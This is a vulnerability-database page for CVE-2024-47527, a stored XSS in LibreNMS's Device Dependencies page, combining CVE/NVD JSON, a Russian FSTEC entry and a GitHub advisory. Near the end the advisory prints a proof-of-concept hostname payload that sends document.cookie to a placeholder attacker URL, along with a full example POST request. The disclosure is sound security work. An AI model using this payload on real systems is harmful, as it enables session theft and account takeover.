Vulnerability-Lookup

CVE-2024-47527 (GCVE-0-2024-47527)

Vulnerability from cvelistv5 – Published: 2024-10-01 20:23 – Updated: 2024-10-01 20:36

Title

LibreNMS has a Stored XSS ('Cross-site Scripting') in librenms/includes/html/pages/device-dependencies.inc.php

Summary

LibreNMS is an open-source, PHP/MySQL/SNMP-based network monitoring system. A Stored Cross-Site Scripting (XSS) vulnerability in the "Device Dependencies" feature allows authenticated users to inject arbitrary JavaScript through the device name ("hostname" parameter). This vulnerability can lead to the execution of malicious code in the context of other users' sessions, potentially compromising their accounts and allowing unauthorized actions. This vulnerability is fixed in 24.9.0.

Severity ?

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L

CWE

CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Assigner

GitHub_M

References

URL

Tags

	https://github.com/librenms/librenms/security/adv…	x_refsource_CONFIRM
	https://github.com/librenms/librenms/commit/36b38…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	librenms	librenms	Affected: < 24.9.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:a:librenms:librenms:*:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "librenms",
            "vendor": "librenms",
            "versions": [
              {
                "lessThan": "24.9.0",
                "status": "affected",
                "version": "0",
                "versionType": "custom"
              }
            ]
          }
        ],
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-47527",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-10-01T20:34:28.125747Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-10-01T20:36:02.148Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "librenms",
          "vendor": "librenms",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 24.9.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "LibreNMS is an open-source, PHP/MySQL/SNMP-based network monitoring system. A Stored Cross-Site Scripting (XSS) vulnerability in the \"Device Dependencies\" feature allows authenticated users to inject arbitrary JavaScript through the device name (\"hostname\" parameter). This vulnerability can lead to the execution of malicious code in the context of other users\u0027 sessions, potentially compromising their accounts and allowing unauthorized actions. This vulnerability is fixed in 24.9.0."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "privilegesRequired": "HIGH",
            "scope": "CHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-79",
              "description": "CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2024-10-01T20:23:38.100Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/librenms/librenms/security/advisories/GHSA-rwwc-2v8q-gc9v",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/librenms/librenms/security/advisories/GHSA-rwwc-2v8q-gc9v"
        },
        {
          "name": "https://github.com/librenms/librenms/commit/36b38a50cc10d4ed16caab92bdc18ed6abac9685",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/librenms/librenms/commit/36b38a50cc10d4ed16caab92bdc18ed6abac9685"
        }
      ],
      "source": {
        "advisory": "GHSA-rwwc-2v8q-gc9v",
        "discovery": "UNKNOWN"
      },
      "title": "LibreNMS has a Stored XSS (\u0027Cross-site Scripting\u0027) in librenms/includes/html/pages/device-dependencies.inc.php"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2024-47527",
    "datePublished": "2024-10-01T20:23:38.100Z",
    "dateReserved": "2024-09-25T21:46:10.928Z",
    "dateUpdated": "2024-10-01T20:36:02.148Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2024-47527",
      "date": "2026-05-06",
      "epss": "0.0038",
      "percentile": "0.59455"
    },
    "fkie_nvd": {
      "configurations": "[{\"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:librenms:librenms:*:*:*:*:*:*:*:*\", \"versionEndExcluding\": \"24.9.0\", \"matchCriteriaId\": \"E39B6DE8-DAD4-4158-B2BF-93B804AE09FF\"}]}]}]",
      "descriptions": "[{\"lang\": \"en\", \"value\": \"LibreNMS is an open-source, PHP/MySQL/SNMP-based network monitoring system. A Stored Cross-Site Scripting (XSS) vulnerability in the \\\"Device Dependencies\\\" feature allows authenticated users to inject arbitrary JavaScript through the device name (\\\"hostname\\\" parameter). This vulnerability can lead to the execution of malicious code in the context of other users\u0027 sessions, potentially compromising their accounts and allowing unauthorized actions. This vulnerability is fixed in 24.9.0.\"}, {\"lang\": \"es\", \"value\": \"LibreNMS es un sistema de monitoreo de red de c\\u00f3digo abierto basado en PHP/MySQL/SNMP. Una vulnerabilidad de Cross-Site Scripting (XSS) almacenado en la funci\\u00f3n \\\"Dependencias del dispositivo\\\" permite a los usuarios autenticados inyectar c\\u00f3digo JavaScript arbitrario a trav\\u00e9s del nombre del dispositivo (par\\u00e1metro \\\"hostname\\\"). Esta vulnerabilidad puede provocar la ejecuci\\u00f3n de c\\u00f3digo malicioso en el contexto de las sesiones de otros usuarios, lo que podr\\u00eda comprometer sus cuentas y permitir acciones no autorizadas. Esta vulnerabilidad se solucion\\u00f3 en la versi\\u00f3n 24.9.0.\"}]",
      "id": "CVE-2024-47527",
      "lastModified": "2024-10-07T19:08:41.467",
      "metrics": "{\"cvssMetricV31\": [{\"source\": \"security-advisories@github.com\", \"type\": \"Secondary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L\", \"baseScore\": 7.5, \"baseSeverity\": \"HIGH\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"HIGH\", \"userInteraction\": \"REQUIRED\", \"scope\": \"CHANGED\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"LOW\", \"availabilityImpact\": \"LOW\"}, \"exploitabilityScore\": 1.7, \"impactScore\": 5.3}, {\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\", \"baseScore\": 5.4, \"baseSeverity\": \"MEDIUM\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"LOW\", \"userInteraction\": \"REQUIRED\", \"scope\": \"CHANGED\", \"confidentialityImpact\": \"LOW\", \"integrityImpact\": \"LOW\", \"availabilityImpact\": \"NONE\"}, \"exploitabilityScore\": 2.3, \"impactScore\": 2.7}]}",
      "published": "2024-10-01T21:15:07.967",
      "references": "[{\"url\": \"https://github.com/librenms/librenms/commit/36b38a50cc10d4ed16caab92bdc18ed6abac9685\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Product\"]}, {\"url\": \"https://github.com/librenms/librenms/security/advisories/GHSA-rwwc-2v8q-gc9v\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Exploit\", \"Vendor Advisory\"]}]",
      "sourceIdentifier": "security-advisories@github.com",
      "vulnStatus": "Analyzed",
      "weaknesses": "[{\"source\": \"security-advisories@github.com\", \"type\": \"Primary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-79\"}]}]"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2024-47527\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2024-10-01T21:15:07.967\",\"lastModified\":\"2024-10-07T19:08:41.467\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"LibreNMS is an open-source, PHP/MySQL/SNMP-based network monitoring system. A Stored Cross-Site Scripting (XSS) vulnerability in the \\\"Device Dependencies\\\" feature allows authenticated users to inject arbitrary JavaScript through the device name (\\\"hostname\\\" parameter). This vulnerability can lead to the execution of malicious code in the context of other users\u0027 sessions, potentially compromising their accounts and allowing unauthorized actions. This vulnerability is fixed in 24.9.0.\"},{\"lang\":\"es\",\"value\":\"LibreNMS es un sistema de monitoreo de red de c\u00f3digo abierto basado en PHP/MySQL/SNMP. Una vulnerabilidad de Cross-Site Scripting (XSS) almacenado en la funci\u00f3n \\\"Dependencias del dispositivo\\\" permite a los usuarios autenticados inyectar c\u00f3digo JavaScript arbitrario a trav\u00e9s del nombre del dispositivo (par\u00e1metro \\\"hostname\\\"). Esta vulnerabilidad puede provocar la ejecuci\u00f3n de c\u00f3digo malicioso en el contexto de las sesiones de otros usuarios, lo que podr\u00eda comprometer sus cuentas y permitir acciones no autorizadas. Esta vulnerabilidad se solucion\u00f3 en la versi\u00f3n 24.9.0.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"HIGH\",\"userInteraction\":\"REQUIRED\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"LOW\"},\"exploitabilityScore\":1.7,\"impactScore\":5.3},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\",\"baseScore\":5.4,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"REQUIRED\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.3,\"impactScore\":2.7}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-79\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:librenms:librenms:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"24.9.0\",\"matchCriteriaId\":\"E39B6DE8-DAD4-4158-B2BF-93B804AE09FF\"}]}]}],\"references\":[{\"url\":\"https://github.com/librenms/librenms/commit/36b38a50cc10d4ed16caab92bdc18ed6abac9685\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\"]},{\"url\":\"https://github.com/librenms/librenms/security/advisories/GHSA-rwwc-2v8q-gc9v\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2024-47527\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2024-10-01T20:34:28.125747Z\"}}}], \"affected\": [{\"cpes\": [\"cpe:2.3:a:librenms:librenms:*:*:*:*:*:*:*:*\"], \"vendor\": \"librenms\", \"product\": \"librenms\", \"versions\": [{\"status\": \"affected\", \"version\": \"0\", \"lessThan\": \"24.9.0\", \"versionType\": \"custom\"}], \"defaultStatus\": \"unknown\"}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2024-10-01T20:35:37.999Z\"}}], \"cna\": {\"title\": \"LibreNMS has a Stored XSS (\u0027Cross-site Scripting\u0027) in librenms/includes/html/pages/device-dependencies.inc.php\", \"source\": {\"advisory\": \"GHSA-rwwc-2v8q-gc9v\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"CHANGED\", \"version\": \"3.1\", \"baseScore\": 7.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"REQUIRED\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"LOW\", \"privilegesRequired\": \"HIGH\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"librenms\", \"product\": \"librenms\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 24.9.0\"}]}], \"references\": [{\"url\": \"https://github.com/librenms/librenms/security/advisories/GHSA-rwwc-2v8q-gc9v\", \"name\": \"https://github.com/librenms/librenms/security/advisories/GHSA-rwwc-2v8q-gc9v\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/librenms/librenms/commit/36b38a50cc10d4ed16caab92bdc18ed6abac9685\", \"name\": \"https://github.com/librenms/librenms/commit/36b38a50cc10d4ed16caab92bdc18ed6abac9685\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"LibreNMS is an open-source, PHP/MySQL/SNMP-based network monitoring system. A Stored Cross-Site Scripting (XSS) vulnerability in the \\\"Device Dependencies\\\" feature allows authenticated users to inject arbitrary JavaScript through the device name (\\\"hostname\\\" parameter). This vulnerability can lead to the execution of malicious code in the context of other users\u0027 sessions, potentially compromising their accounts and allowing unauthorized actions. This vulnerability is fixed in 24.9.0.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-79\", \"description\": \"CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2024-10-01T20:23:38.100Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2024-47527\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2024-10-01T20:36:02.148Z\", \"dateReserved\": \"2024-09-25T21:46:10.928Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2024-10-01T20:23:38.100Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

BDU:2024-09474

Vulnerability from fstec - Published: 01.10.2024

Title

Уязвимость функции Device Dependencies системы сетевого мониторинга LibreNMS, позволяющая нарушителю проводить межсайтовые сценарные атаки

Description

Уязвимость функции Device Dependencies системы сетевого мониторинга LibreNMS связана с непринятием мер по защите структуры веб-страницы. Эксплуатация уязвимости может позволить нарушителю, действующему удалённо, проводить межсайтовые сценарные атаки

Severity ?


                    
                      AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L

Vendor

Сообщество свободного программного обеспечения

Software Name

LibreNMS

Software Version

до 24.9.0 (LibreNMS)

Possible Mitigations

Использование рекомендаций: https://github.com/librenms/librenms/commit/36b38a50cc10d4ed16caab92bdc18ed6abac9685

Reference

https://github.com/librenms/librenms/commit/36b38a50cc10d4ed16caab92bdc18ed6abac9685 https://github.com/librenms/librenms/security/advisories/GHSA-rwwc-2v8q-gc9v

CWE

CWE-79

JSON

To clipboard

{
  "CVSS 2.0": "AV:N/AC:L/Au:S/C:C/I:P/A:P",
  "CVSS 3.0": "AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L",
  "CVSS 4.0": null,
  "remediation_\u0418\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440": null,
  "remediation_\u041d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435": null,
  "\u0412\u0435\u043d\u0434\u043e\u0440 \u041f\u041e": "\u0421\u043e\u043e\u0431\u0449\u0435\u0441\u0442\u0432\u043e \u0441\u0432\u043e\u0431\u043e\u0434\u043d\u043e\u0433\u043e \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f",
  "\u0412\u0435\u0440\u0441\u0438\u044f \u041f\u041e": "\u0434\u043e 24.9.0 (LibreNMS)",
  "\u0412\u043e\u0437\u043c\u043e\u0436\u043d\u044b\u0435 \u043c\u0435\u0440\u044b \u043f\u043e \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044e": "\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0439:\nhttps://github.com/librenms/librenms/commit/36b38a50cc10d4ed16caab92bdc18ed6abac9685",
  "\u0414\u0430\u0442\u0430 \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0438\u044f": "01.10.2024",
  "\u0414\u0430\u0442\u0430 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0433\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f": "14.11.2024",
  "\u0414\u0430\u0442\u0430 \u043f\u0443\u0431\u043b\u0438\u043a\u0430\u0446\u0438\u0438": "14.11.2024",
  "\u0418\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440": "BDU:2024-09474",
  "\u0418\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440\u044b \u0434\u0440\u0443\u0433\u0438\u0445 \u0441\u0438\u0441\u0442\u0435\u043c \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "CVE-2024-47527",
  "\u0418\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u043e\u0431 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u0438": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0430",
  "\u041a\u043b\u0430\u0441\u0441 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043a\u043e\u0434\u0430",
  "\u041d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 \u041f\u041e": "LibreNMS",
  "\u041d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435 \u041e\u0421 \u0438 \u0442\u0438\u043f \u0430\u043f\u043f\u0430\u0440\u0430\u0442\u043d\u043e\u0439 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u044b": null,
  "\u041d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0444\u0443\u043d\u043a\u0446\u0438\u0438 Device Dependencies \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0441\u0435\u0442\u0435\u0432\u043e\u0433\u043e \u043c\u043e\u043d\u0438\u0442\u043e\u0440\u0438\u043d\u0433\u0430 LibreNMS, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u043d\u0430\u0440\u0443\u0448\u0438\u0442\u0435\u043b\u044e \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u0442\u044c \u043c\u0435\u0436\u0441\u0430\u0439\u0442\u043e\u0432\u044b\u0435 \u0441\u0446\u0435\u043d\u0430\u0440\u043d\u044b\u0435 \u0430\u0442\u0430\u043a\u0438",
  "\u041d\u0430\u043b\u0438\u0447\u0438\u0435 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430": "\u0414\u0430\u043d\u043d\u044b\u0435 \u0443\u0442\u043e\u0447\u043d\u044f\u044e\u0442\u0441\u044f",
  "\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u043e\u0448\u0438\u0431\u043a\u0438 CWE": "\u041d\u0435\u043f\u0440\u0438\u043d\u044f\u0442\u0438\u0435 \u043c\u0435\u0440 \u043f\u043e \u0437\u0430\u0449\u0438\u0442\u0435 \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b \u0432\u0435\u0431-\u0441\u0442\u0440\u0430\u043d\u0438\u0446\u044b (\u0438\u043b\u0438 \\\u00ab\u041c\u0435\u0436\u0441\u0430\u0439\u0442\u043e\u0432\u0430\u044f \u0441\u0446\u0435\u043d\u0430\u0440\u043d\u0430\u044f \u0430\u0442\u0430\u043a\u0430\\\u00bb) (CWE-79)",
  "\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0444\u0443\u043d\u043a\u0446\u0438\u0438 Device Dependencies \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0441\u0435\u0442\u0435\u0432\u043e\u0433\u043e \u043c\u043e\u043d\u0438\u0442\u043e\u0440\u0438\u043d\u0433\u0430 LibreNMS \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u043d\u0435\u043f\u0440\u0438\u043d\u044f\u0442\u0438\u0435\u043c \u043c\u0435\u0440 \u043f\u043e \u0437\u0430\u0449\u0438\u0442\u0435 \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b \u0432\u0435\u0431-\u0441\u0442\u0440\u0430\u043d\u0438\u0446\u044b. \u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442\u044c \u043d\u0430\u0440\u0443\u0448\u0438\u0442\u0435\u043b\u044e, \u0434\u0435\u0439\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u043c\u0443 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e, \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u0442\u044c \u043c\u0435\u0436\u0441\u0430\u0439\u0442\u043e\u0432\u044b\u0435 \u0441\u0446\u0435\u043d\u0430\u0440\u043d\u044b\u0435 \u0430\u0442\u0430\u043a\u0438",
  "\u041f\u043e\u0441\u043b\u0435\u0434\u0441\u0442\u0432\u0438\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": null,
  "\u041f\u0440\u043e\u0447\u0430\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f": null,
  "\u0421\u0432\u044f\u0437\u044c \u0441 \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u0430\u043c\u0438 \u0418\u0411": "\u0414\u0430\u043d\u043d\u044b\u0435 \u0443\u0442\u043e\u0447\u043d\u044f\u044e\u0442\u0441\u044f",
  "\u0421\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u041e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u0430",
  "\u0421\u043f\u043e\u0441\u043e\u0431 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f": "\u041e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f",
  "\u0421\u043f\u043e\u0441\u043e\u0431 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438": "\u0418\u043d\u044a\u0435\u043a\u0446\u0438\u044f",
  "\u0421\u0441\u044b\u043b\u043a\u0438 \u043d\u0430 \u0438\u0441\u0442\u043e\u0447\u043d\u0438\u043a\u0438": "https://github.com/librenms/librenms/commit/36b38a50cc10d4ed16caab92bdc18ed6abac9685\nhttps://github.com/librenms/librenms/security/advisories/GHSA-rwwc-2v8q-gc9v",
  "\u0421\u0442\u0430\u0442\u0443\u0441 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u041f\u043e\u0434\u0442\u0432\u0435\u0440\u0436\u0434\u0435\u043d\u0430 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0438\u0442\u0435\u043b\u0435\u043c",
  "\u0422\u0438\u043f \u041f\u041e": "\u0421\u0435\u0442\u0435\u0432\u043e\u0435 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0435 \u0441\u0440\u0435\u0434\u0441\u0442\u0432\u043e",
  "\u0422\u0438\u043f \u043e\u0448\u0438\u0431\u043a\u0438 CWE": "CWE-79",
  "\u0423\u0440\u043e\u0432\u0435\u043d\u044c \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u0412\u044b\u0441\u043e\u043a\u0438\u0439 \u0443\u0440\u043e\u0432\u0435\u043d\u044c \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 (\u0431\u0430\u0437\u043e\u0432\u0430\u044f \u043e\u0446\u0435\u043d\u043a\u0430 CVSS 2.0 \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 8)\n\u0412\u044b\u0441\u043e\u043a\u0438\u0439 \u0443\u0440\u043e\u0432\u0435\u043d\u044c \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 (\u0431\u0430\u0437\u043e\u0432\u0430\u044f \u043e\u0446\u0435\u043d\u043a\u0430 CVSS 3.0 \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 7,5)"
}

GHSA-RWWC-2V8Q-GC9V

Vulnerability from github – Published: 2024-10-01 20:31 – Updated: 2024-10-01 21:53

Summary

LibreNMS has Stored Cross-site Scripting vulnerability in "Device Dependencies" feature

Details

Summary

A Stored Cross-Site Scripting (XSS) vulnerability in the "Device Dependencies" feature allows authenticated users to inject arbitrary JavaScript through the device name ("hostname" parameter). This vulnerability can lead to the execution of malicious code in the context of other users' sessions, potentially compromising their accounts and allowing unauthorized actions.

Details

The vulnerability occurs when creating a device within LibreNMS. An attacker can inject arbitrary JavaScript into the hostname parameter. This malicious script is then executed when another user visits the device dependencies page, resulting in an automatic redirect to a website controlled by the attacker. This redirect can be used to steal session cookies or perform other malicious actions.

For example, the following payload can be used to exploit the vulnerability: t'' autofocus onfocus="document.location='https://<attacker_url>/?c='+document.cookie"

When the device dependencies page is loaded, this payload triggers the JavaScript, causing the user's browser to redirect to the attacker's website with any non-httponly cookies in the URL.

The root cause of this vulnerability is the application's failure to sanitize the row.hostname value before including it in the HTML output.

This is evident in the following line of code: https://github.com/librenms/librenms/blob/9455173edce6971777cf6666d540eeeaf6201920/includes/html/pages/device-dependencies.inc.php#L74

PoC

Add a new device using the following payload for the hostname: t'' autofocus onfocus="document.location='https://<attacker_url>/?c='+document.cookie"
Save the device.
Navigate to the device dependencies page.
Observe that the injected script executes, redirecting the user to the attacker's website with any non-httponly cookies included in the URL.

Example Request:

POST /addhost HTTP/1.1
Host: <your_host>
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: <your_cookie>

_token=<your_token>&hostname=t%27%27+autofocus+onfocus%3D%22document.location%3D%27https%3A%2F%<attacker_url>%2F%3Fc%3D%27%2Bdocument.cookie%22&sysName=&hardware=&os=&os_id=&snmpver=v2c&port=&transport=udp&port_assoc_mode=ifIndex&community=&authlevel=noAuthNoPriv&authname=&authpass=&authalgo=SHA&cryptopass=&cryptoalgo=AES&force_add=on&Submit=

Impact

